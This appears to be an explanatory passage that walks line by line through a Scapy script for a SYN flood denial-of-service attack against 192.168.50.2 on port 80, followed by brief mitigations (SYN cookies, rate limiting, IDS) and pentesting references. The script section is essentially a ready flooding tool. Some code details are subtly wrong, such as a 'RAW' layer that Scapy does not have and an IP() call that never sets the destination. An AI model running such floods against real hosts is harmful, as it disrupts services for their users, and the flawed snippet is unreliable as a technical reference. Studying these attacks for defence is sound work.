A SYN flood attack exploits the TCP handshake process by sending a large number of SYN packets to a target, consuming resources and causing a denial of service.
Step-by-Step Explanation
Understanding the Script:
ip = IP("192.168.50.2"): Sets the target IP address.
tcp = TCP(sport=RandShort(), dport=80, flags="S"): Creates a TCP packet with a SYN flag set.
raw = RAW(b"X"*1024): Adds a payload to the packet.
p = ip/tcp/raw: Combines IP, TCP, and RAW layers into a single packet.
send(p, loop=1, verbose=0): Sends the packet in a loop continuously.
Purpose of SYN Flood:
Resource Exhaustion: The attack consumes resources by opening many half-open connections.
Denial of Service: The target system becomes unable to process legitimate requests due to resource depletion.
Detection and Mitigation:
Rate Limiting: Implement rate limiting on incoming SYN packets.
SYN Cookies: Use SYN cookies to handle large numbers of SYN requests without consuming resources.
Firewalls and IDS: Deploy firewalls and Intrusion Detection Systems (IDS) to detect and mitigate SYN flood attacks.
Reference from Pentesting Literature:
SYN flood attacks are a classic denial-of-service technique discussed in penetration testing guides.
HTB write-ups frequently illustrate the use of SYN flood attacks to test the resilience of network services.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups